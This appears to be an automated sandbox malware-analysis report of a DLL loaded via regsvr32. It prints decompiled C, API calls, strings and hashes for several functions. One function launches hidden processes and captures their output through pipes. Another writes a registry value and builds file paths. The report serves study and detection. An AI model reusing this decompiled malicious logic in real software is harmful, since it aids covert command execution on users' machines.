Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764

Uniqueness

Uniqueness Score: -1.00%

Function 10012122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L10012285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L100122CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E10008706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x100109b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

0x10012125
0x1001212a
0x1001212e
0x1001212e
0x10012133
0x10012138
0x10012139
0x1001213c
0x1001213d
0x10012142
0x10012145
0x10012146
0x1001214b
0x10012152
0x100121f8
0x100121f8
0x00000000
0x10012161
0x10012161
0x10012168
0x1001216c
0x10012173
0x1001217c
0x1001217e
0x1001217e
0x1001217c
0x1001218d
0x100121b3
0x100121bc
0x100121be
0x100121c4
0x100121f3
0x100121f3
0x100121fb
0x100121fe
0x100121fe
0x100121c6
0x100121c7
0x100121cd
0x100121cf
0x100121cf
0x100121d4
0x100121d3
0x100121d3
0x100121db
0x100121e7
0x100121f1
0x100121f1
0x00000000
0x1001219d
0x1001219d
0x1001219d
0x100121a3
0x00000000
0x00000000
0x100121a5
0x100121ab
0x100121b0
0x00000000
0x100121b0
0x1001218d

APIs

_snprintf.MSVCRT ref: 10012146
localeconv.MSVCRT ref: 10012161
strchr.MSVCRT ref: 10012173
strchr.MSVCRT ref: 10012184
strchr.MSVCRT ref: 10012192
strchr.MSVCRT ref: 100121B7

Strings

%.*g, xrefs: 1001213D

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0

Uniqueness

Uniqueness Score: -1.00%

Function 100102B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 10010332
qsort.MSVCRT ref: 100105B0

Strings

%I64d, xrefs: 10010324
false, xrefs: 10010315
null, xrefs: 100102F7
true, xrefs: 10010309

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10004A0B, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x1001e688; // 0x2de0590
					_t125 =  *0x1001e68c; // 0x2e5fc68
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E1000BB8D(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E1000B7A8(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E1000B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
					E1000B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E100092E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x1001e688; // 0x2de0590
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E100091E3(_v1112);
								_t145 = _t130;
								 *0x1001e740 = _t76;
								 *0x1001e738 = E100091E3(_t145);
								L17:
								_push(_t145);
								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x1001b9ca);
								E10009F48(0xe);
								E10009F6C(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E1000A0AB(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E1000A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E1000A3ED(_t188, _t180, _t208);
								}
								_t87 = E1000980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E1000A0AB(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x1001e688; // 0x2de0590
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x1001e688; // 0x2de0590
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E1000E23E(_t183);
										}
										E100052C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x1001e688; // 0x2de0590
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E1000109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E100085D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0x2de07b8
									_t153 = _t51;
									L25:
									_t90 = E1000553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x1001e688; // 0x2de0590
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E1000C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x1001e684; // 0x2e5faa0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x1001e684; // 0x2e5faa0
								 *((intOrPtr*)(_t109 + 0x30))();
								E1000861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E1000861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E1000E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E100095E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E100085D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E10002BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

0x10004a0b
0x10004a18
0x10004a23
0x10004a28
0x10004a2a
0x10004a2d
0x10004a32
0x10004a35
0x10004a3f
0x10004a41
0x10004a4e
0x10004a57
0x10004a57
0x10004a64
0x10004a7f
0x10004a86
0x10004a88
0x10004a8d
0x10004a92
0x10004a98
0x10004aa7
0x10004ac6
0x10004ac8
0x10004ace
0x10004ad4
0x10004ad9
0x10004add
0x10004ae0
0x10004aea
0x10004aec
0x10004aed
0x10004af8
0x10004afa
0x10004afd
0x10004b02
0x10004b09
0x10004b5e
0x10004b5e
0x10004b63
0x10004bca
0x10004bcf
0x10004bd1
0x10004bdb
0x10004be0
0x10004be0
0x10004bfa
0x10004bfc
0x10004bff
0x10004c01
0x00000000
0x00000000
0x10004c07
0x10004c11
0x10004c1a
0x10004c1f
0x10004c22
0x10004c28
0x10004c2e
0x10004c36
0x10004c38
0x10004c3b
0x10004c3c
0x10004c41
0x10004c44
0x10004c47
0x10004c49
0x10004c4d
0x10004c4d
0x10004c52
0x10004c55
0x10004c57
0x10004c5b
0x10004c5b
0x10004c62
0x10004c67
0x10004c69
0x10004c6d
0x10004c6f
0x10004c75
0x10004c79
0x10004c7c
0x10004c7d
0x10004c82
0x10004c85
0x10004c8a
0x10004cb2
0x10004cb8
0x10004cbf
0x10004cce
0x10004cd3
0x00000000
0x10004cd3
0x10004cc1
0x00000000
0x10004c8c
0x10004c8c
0x10004c91
0x10004c98
0x10004cdd
0x10004cdd
0x10004ce4
0x10004ce8
0x10004ce9
0x10004ce9
0x10004cf3
0x10004cf8
0x10004cfb
0x10004cfc
0x10004cfe
0x10004d00
0x10004d05
0x10004d0c
0x10004d4f
0x10004d0e
0x10004d13
0x10004d1b
0x10004d1f
0x10004d2a
0x10004d35
0x10004d3d
0x10004d41
0x10004d49
0x10004d49
0x10004d0c
0x10004d55
0x10004d58
0x10004d5a
0x10004d60
0x10004d60
0x10004d62
0x10004d62
0x00000000
0x10004d62
0x10004c9a
0x10004c9a
0x10004ca0
0x10004ca2
0x10004ca7
0x10004ca7
0x10004ca9
0x10004cd8
0x00000000
0x10004cd8
0x10004cab
0x10004ae4
0x10004ae4
0x00000000
0x10004ae4
0x10004c8a
0x10004b69
0x10004b77
0x10004b8a
0x10004b8f
0x10004b95
0x10004b97
0x10004baf
0x10004bb4
0x10004bbd
0x10004bc3
0x00000000
0x10004bc3
0x10004b9f
0x10004ba8
0x00000000
0x10004ba8
0x10004b0b
0x10004b11
0x10004b13
0x10004b51
0x10004b53
0x00000000
0x00000000
0x10004b55
0x10004b59
0x00000000
0x10004b59
0x10004b15
0x10004b1f
0x10004b2b
0x10004b36
0x10004b3d
0x10004b47
0x10004b4c
0x00000000
0x10004b4c
0x10004ae2
0x00000000
0x10004a66
0x10004a71
0x10004a77
0x10004a79
0x10004d64
0x10004d64
0x10004d66
0x10004d6c
0x10004d6c
0x00000000
0x10004a79

APIs

memset.MSVCRT ref: 10004A2D
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D1F
lstrcatW.KERNEL32 ref: 10004D3D
lstrcatW.KERNEL32 ref: 10004D41
lstrcatW.KERNEL32 ref: 10004D49
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D4F

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56

Uniqueness

Uniqueness Score: -1.00%

Function 1000D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 1000D75C
SysAllocString.OLEAUT32(?), ref: 1000D764
SysAllocString.OLEAUT32(00000000), ref: 1000D778
SysFreeString.OLEAUT32(?), ref: 1000D7F3
SysFreeString.OLEAUT32(?), ref: 1000D7F6
SysFreeString.OLEAUT32(?), ref: 1000D7FB

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 100107F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 10010865
\u%04X\u%04X, xrefs: 10010950
\u%04X, xrefs: 10010911

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 100121FF, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E100121FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L100122CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L10012291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x10018250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L10012291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x10018258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

0x100121ff
0x10012207
0x1001220c
0x1001220f
0x10012214
0x1001221a
0x10012223
0x10012227
0x10012227
0x10012223
0x10012229
0x1001222e
0x10012237
0x1001223c
0x1001223f
0x10012248
0x1001224a
0x10012251
0x10012262
0x10012262
0x10012264
0x1001226c
0x10012273
0x00000000
0x1001226e
0x10012272
0x10012272
0x10012253
0x10012253
0x10012259
0x1001225b
0x10012260
0x10012276
0x10012279
0x1001227e
0x00000000
0x00000000
0x00000000
0x10012260

APIs

localeconv.MSVCRT ref: 10012207
strchr.MSVCRT ref: 1001221A
_errno.MSVCRT ref: 10012229
strtod.MSVCRT ref: 10012237
_errno.MSVCRT ref: 10012264

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF84, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x1001e688; // 0x2de0590
				GetCurrentProcess();
				_t11 = E1000BA05();
				_t1 = _t29 + 0x1644; // 0x2de1bd4
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E10008FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0x2de07b8
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E1000E3B6(_t3);
				_t7 = _t29 + 0x220; // 0x2de07b0
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E1000E3F1(_t7);
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

0x1000cf87
0x1000cf89
0x1000cf90
0x1000cf98
0x1000cfa2
0x1000cfa2
0x1000cfa8
0x1000cfb1
0x1000cfb7
0x1000cfb9
0x1000cfbd
0x1000cfbd
0x1000cfc2
0x1000cfc8
0x1000cfd8
0x1000cfe2
0x1000cfea
0x1000cfed
0x1000cff9
0x1000cfff
0x1000d004
0x1000d00a
0x1000d010
0x1000d016
0x1000d01e

APIs

GetCurrentProcess.KERNEL32(?,?,02DE0590,?,10003545), ref: 1000CF90
GetModuleFileNameW.KERNEL32(00000000,02DE1BD4,00000105,?,?,02DE0590,?,10003545), ref: 1000CFB1
memset.MSVCRT ref: 1000CFE2
GetVersionExA.KERNEL32(02DE0590,02DE0590,?,10003545), ref: 1000CFED
GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E1000861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x1001e684; // 0x2e5faa0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x1001e684; // 0x2e5faa0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E10008604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x1001e684; // 0x2e5faa0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x1001e684; // 0x2e5faa0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x1001e684; // 0x2e5faa0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x1001e684; // 0x2e5faa0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E100091A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E10009292(_t127);
						E1000861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E1000C379(_t127));
				_t98 =  *0x1001e68c; // 0x2e5fc68
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x1001e684; // 0x2e5faa0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x1001e684; // 0x2e5faa0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E10009256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E1000861A( &_v32, 0);
				return _t128;
			}

0x1000a9c2
0x1000a9c4
0x1000a9d0
0x1000a9d5
0x1000a9d8
0x1000a9da
0x1000a9dd
0x1000a9e0
0x1000a9e7
0x1000a9ea
0x1000a9f1
0x1000a9f4
0x1000a9fe
0x1000a9ff
0x1000aa02
0x1000aa04
0x1000aa05
0x1000aa1c
0x1000ab9c
0x00000000
0x1000ab9c
0x1000aa33
0x1000ab68
0x1000ab6e
0x1000ab79
0x1000ab7b
0x1000ab83
0x1000ab83
0x1000ab8a
0x1000ab8c
0x1000ab95
0x1000ab95
0x00000000
0x1000ab98
0x1000aa39
0x1000aa3c
0x1000aa3f
0x1000aa45
0x1000aa4f
0x1000aa59
0x1000aa60
0x1000aa69
0x1000aa6b
0x1000aa71
0x00000000
0x00000000
0x1000aa7c
0x1000aa83
0x1000aa84
0x1000aa89
0x1000aa8a
0x1000aa8b
0x1000aa90
0x1000aa92
0x1000aa93
0x1000aa94
0x1000aa97
0x1000aa9d
0x00000000
0x00000000
0x1000aaa3
0x1000aaab
0x1000aaae
0x1000aab6
0x1000aab9
0x1000aabc
0x1000aac2
0x1000aad6
0x1000aadc
0x1000aae2
0x1000ab0b
0x1000aae4
0x1000aae4
0x1000aae6
0x1000aae8
0x1000aaf0
0x1000aaf8
0x1000aafd
